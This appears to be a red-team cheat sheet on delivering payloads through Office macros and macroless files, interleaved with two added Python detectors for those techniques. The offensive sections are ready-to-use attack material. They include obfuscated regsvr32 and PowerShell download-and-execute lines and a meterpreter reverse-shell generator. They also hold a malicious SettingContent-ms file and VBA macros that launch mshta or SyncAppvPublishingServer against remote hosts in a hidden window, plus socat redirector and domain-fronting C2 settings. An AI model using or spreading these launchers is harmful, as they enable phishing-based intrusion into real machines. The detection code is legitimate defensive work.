1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g.
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
2. Generate Macro (by enigma0x3)
iex(New-Object net.webClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1');
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1
3. Macroless OLE SettingContent-ms
python unicorn.py windows/meterpreter/reverse_https IP 443 hta
--------------------------
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
<ApplicationInformation>
<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
<DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
<Icon>%windir%\system32\control.exe</Icon>
</ApplicationInformation>
<SettingIdentity>
<PageID></PageID>
<HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
</SettingIdentity>
<SettingInformation>
<Description>@shell32.dll,-4161</Description>
<Keywords>@shell32.dll,-4161</Keywords>
</SettingInformation>
</SearchableContent>
</PCSettings>
--------------------------
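Added example (not part of the gist): a small inspector for SettingContent-ms files that parses the XML above and reports what the DeepLink actually launches, so a mail gateway or triage script can flag a "Settings shortcut" whose deep link points at mshta.exe (or another interpreter) or carries a remote URL. The SUSPICIOUS_BINARIES set, the document IP 192.0.2.10 and both sample files are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by SettingContent-ms files (taken from the sample above).
NS = {"sc": "http://schemas.microsoft.com/Search/2013/SettingContent"}

# Interpreters and proxy-execution binaries that a Settings deep link has no
# business launching. The set is an assumption for this example, not a
# Microsoft-published list.
SUSPICIOUS_BINARIES = {
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "powershell.exe", "pwsh.exe",
    "cmd.exe", "wscript.exe", "cscript.exe", "syncappvpublishingserver.exe",
}
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")


def inspect_settingcontent(xml_text: str) -> dict:
    """Parse one SettingContent-ms document and report what its DeepLink runs."""
    # Encode to bytes so the XML declaration is accepted regardless of Python version.
    root = ET.fromstring(xml_text.strip().encode("utf-8"))
    result = {"deeplink": None, "binary": None, "remote_url": None, "verdict": "no-deeplink"}
    node = root.find(".//sc:DeepLink", NS)
    if node is None or not (node.text or "").strip():
        return result
    deeplink = node.text.strip()
    result["deeplink"] = deeplink
    # The program is the first token; honour a quoted path with spaces, then
    # drop the directory and compare the file name case-insensitively.
    if deeplink.startswith('"'):
        first = deeplink[1:].split('"', 1)[0]
    else:
        first = deeplink.split()[0]
    result["binary"] = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    m = URL_RE.search(deeplink)
    result["remote_url"] = m.group(0) if m else None
    if result["binary"] in SUSPICIOUS_BINARIES or result["remote_url"]:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "benign"
    return result


# Constructed replica of the malicious sample above, with a documentation IP.
MALICIOUS_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
<ApplicationInformation>
<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
<DeepLink>C:\Windows\System32\mshta.exe http://192.0.2.10/LICENSE.txt</DeepLink>
<Icon>%windir%\system32\control.exe</Icon>
</ApplicationInformation>
</SearchableContent>
</PCSettings>"""

# Constructed benign sample: the deep link opens a Control Panel page, no URL.
BENIGN_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
<ApplicationInformation>
<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
<DeepLink>%windir%\system32\control.exe /name Microsoft.DefaultPrograms</DeepLink>
<Icon>%windir%\system32\control.exe</Icon>
</ApplicationInformation>
</SearchableContent>
</PCSettings>"""


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, inspect_settingcontent(sample))
```

The verdict is deliberately coarse: any DeepLink that names an interpreter or embeds a URL is worth a human look, because legitimate Settings shortcuts launch control.exe or SystemSettings pages with local arguments only.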
* Note: give the Database 644 permissions on the C&C
4. .MAM Access Database
------------------------------
Public Function runme()
runcalculator
End Function
Sub runcalculator()
Shell ("mshta.exe http://IP/LICENSE.txt")
End Sub
------------------------------
5. SyncAppvPublishingServer
--------------------------------------------------
Sub Macro()
Dim x64 As String
x64 = "SyncAppvPublishingServer.exe ""n;WEBDELIVERY_PAYLOAD_W/O_POWERSHELL"""
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create x64
End Sub
--------------------------------------------------------
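Added example (not from the gist): process-creation triage for the three launchers used in sections 1, 4 and 5, regsvr32 with a remote /i: scriptlet, mshta with a URL, and SyncAppvPublishingServer with an inline "n;" script, weighted by whether the parent is an Office application. The rule regexes, the OFFICE_PARENTS and SCRIPT_HOSTS sets and every sample event (paths, 192.0.2.10, PAYLOAD_PLACEHOLDER) are constructed for this example; map the three fields onto your own EDR or Sysmon event 1 data.

```python
import re
from dataclasses import dataclass

# Office hosts that should never spawn a scripting host or proxy-execution
# binary. Both sets are assumptions for this example.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "powershell.exe",
                "cmd.exe", "wscript.exe", "cscript.exe", "syncappvpublishingserver.exe"}

# Command-line signatures for the launchers shown in the gist.
RULES = [
    ("regsvr32_remote_scriptlet",
     re.compile(r"(?i)regsvr32(?:\.exe)?\b.*[/-]i:(?:https?|ftp)://\S+.*scrobj\.dll")),
    ("mshta_remote_url",
     re.compile(r"(?i)mshta(?:\.exe)?\b.*(?:https?|ftp)://")),
    ("syncappv_inline_script",
     re.compile(r"(?i)syncappvpublishingserver(?:\.exe)?\b\s+\"?n;")),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> dict:
    """Match the command line against RULES and rate it by parent/child context."""
    hits = [name for name, rx in RULES if rx.search(ev.command_line)]
    office_parent = basename(ev.parent_image) in OFFICE_PARENTS
    script_host = basename(ev.image) in SCRIPT_HOSTS
    if hits and office_parent:
        severity = "high"      # Office document launching a remote-payload LOLBin
    elif hits:
        severity = "medium"    # same command line from another parent (e.g. explorer)
    elif office_parent and script_host:
        severity = "low"       # Office spawning a script host with no known signature
    else:
        severity = "none"
    return {"rules": hits, "office_parent": office_parent, "severity": severity}


# Constructed events: three mirror the gist's launchers, three are benign.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32 /s /n /u /i:http://192.0.2.10:8080/37yWWx.sct scrobj.dll"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE",
                 r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe http://192.0.2.10/LICENSE.txt"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\SyncAppvPublishingServer.exe",
                 r'SyncAppvPublishingServer.exe "n;PAYLOAD_PLACEHOLDER"'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\alice\AppData\Local\Temp\helper.vbs"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Program Files\Vendor\setup.hta"),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Windows\System32\example.dll"),
]


def triage(events) -> list:
    """Return (severity, rule names, command line) for every event that is not 'none'."""
    out = []
    for ev in events:
        verdict = classify(ev)
        if verdict["severity"] != "none":
            out.append((verdict["severity"], verdict["rules"], ev.command_line))
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Note that the third rule only keys on the "n;" prefix, which is what makes SyncAppvPublishingServer evaluate the rest of the argument as PowerShell; it does not try to inspect the payload, so it also catches the obfuscated output of section 1 as long as that launcher is used.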
6. Domain Fronting + Phishing
Redirector:
socat TCP4-LISTEN:443,fork,reuseaddr TCP4:<C&C IP>:443
C&C:
set LHOST mscrl.microsoft.com
set HttpHostHeader xxxxxxxxxxxxx.azureedge.net